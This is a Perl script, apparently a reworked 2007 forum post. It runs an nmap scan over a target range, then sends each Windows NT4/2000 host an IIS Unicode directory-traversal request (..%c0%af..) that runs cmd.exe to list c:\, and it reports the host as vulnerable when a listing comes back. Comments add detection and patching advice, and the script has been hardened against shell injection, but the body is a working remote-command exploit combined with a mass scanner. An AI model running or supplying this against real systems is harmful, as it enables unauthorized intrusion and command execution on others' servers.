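#!/usr/bin/perl
# uni-test.pl
# Forum post by zbeng, June 10, 2007.
# this is a test program and should be used for educational purposes ONLY!
# NOTE: this was written on a RH Linux6.2 X86 based system.
# you will also need to DL and compile the LWP::Simple.pm module for perl
#
# Purpose: scan a host or range with nmap (SYN scan of port 80 plus OS
# detection), then, for every host whose OS guess mentions NT4 or
# Windows 2000, send one HTTP GET and report the host as vulnerable when the
# response contains a directory listing of c:\.
#
# Defender notes:
#   * The probe path contains "%c0%af", an overlong UTF-8 encoding of "/".
#     Requests carrying that sequence in the URL path are what to search for
#     in web server access logs and what an IDS/WAF rule should match.
#   * A host reported as vulnerable needs the vendor fix for the web server
#     and should not stay reachable from untrusted networks until patched.
#
# Hardening relative to the original listing:
#   * The target is validated and nmap is started in list form, so the value
#     given to -t never passes through a shell.
#   * The fixed path /tmp/targetnet is gone. The script runs as root, and a
#     predictable file name in a world-writable directory can be pre-created
#     or symlinked by another local user.
#   * A failed HTTP request (get() returns undef) is treated as "no match".
use strict;
use warnings;

use File::Temp qw(tempfile);
use Getopt::Std;
use LWP::Simple;

my %args;
getopts('vt:?', \%args) or usage();
usage() if $args{'?'};
usage() unless defined $args{t} && length $args{t};

my $target = $args{t};

# Accept only characters that occur in nmap host/range/CIDR specifications,
# and refuse a leading "-" so the value cannot be read as an nmap option.
$target =~ m{\A (?!-) [A-Za-z0-9._:,/*-]+ \z}x
    or die "Refusing target '$target': unexpected characters\n";

print "Running nmap...\n";
my $results = open_nmap_results($target, $args{v});

print "Please hold checking all servers in list\n";
print "----------------------------------------\n\n";

LINE:
while (my $line = <$results>) {
    # Skip blank lines, the nmap banner and comment lines.
    next LINE if $line =~ /^\n/;
    next LINE if $line =~ /Starting nmap/;
    next LINE if $line =~ /^\#/;

    # Machine-readable host record: "Host: <ipv4> ... OS: <guess>".
    my ($ipaddress, $osguess) = $line
        =~ /^Host: ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}).*?OS: (.*)/;
    if (!defined $ipaddress) {
        warn "Cannot parse: $line";
        next LINE;
    }

    # Only hosts fingerprinted as NT4 / Windows 2000 are probed.
    next LINE unless $osguess =~ /NT4/ || $osguess =~ /Windows 2000/;

    print "Checking $ipaddress for uni-code exploit\n";
    my $content = get("http://$ipaddress/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\");

    # get() returns undef on any HTTP or network failure.
    if (defined $content && $content =~ /Directory of c\:\\/) {
        print "$ipaddress is vulnerable\n";
    }
}

# For the pipe handle, close() reports a non-zero nmap exit status.
close $results
    or warn "nmap did not exit cleanly (wait status $?)\n";

# Run nmap against $target and return a read handle on its machine-readable
# (-oM) output.
#   $target  - already validated host/range specification
#   $verbose - true: let nmap print its normal output to the terminal and
#              collect -oM output in a private temporary file;
#              false: read -oM output straight from a pipe.
# Dies when nmap cannot be started or, in verbose mode, exits non-zero.
sub open_nmap_results {
    my ($scan_target, $verbose) = @_;
    my @scan = ('nmap', '-sS', '-p', '80', '-O', $scan_target);

    if ($verbose) {
        # tempfile() creates the file exclusively with an unpredictable
        # name; UNLINK removes it when the program exits.
        my ($tmp_fh, $tmp_path)
            = tempfile('targetnet-XXXXXX', TMPDIR => 1, UNLINK => 1);
        close $tmp_fh or die "Cannot close $tmp_path: $!";

        system(@scan, '-oM', $tmp_path) == 0
            or die "nmap did not run cleanly (wait status $?)\n";

        open my $file_fh, '<', $tmp_path
            or die "Cannot open file: $tmp_path: $!";
        return $file_fh;
    }

    # List-form pipe open: no shell, no scratch file.
    open my $pipe_fh, '-|', @scan, '-oM', '-'
        or die "Cannot run nmap: $!";
    return $pipe_fh;
}

# Print the help text and leave with exit status 0.
sub usage {
    print <<'USAGE';
Usage: perl uni-test.pl [-v?] -t <target host/net>
    -v          Verbose ( Show nmap output )
    -?          Show this screen
    -t <target> <target> is the nmap host or range you would like to scan
                sample: 192.168.0.2-254
Note: This program requires you to be root, and for you to have
the program NMAP installed.
USAGE
    exit;
}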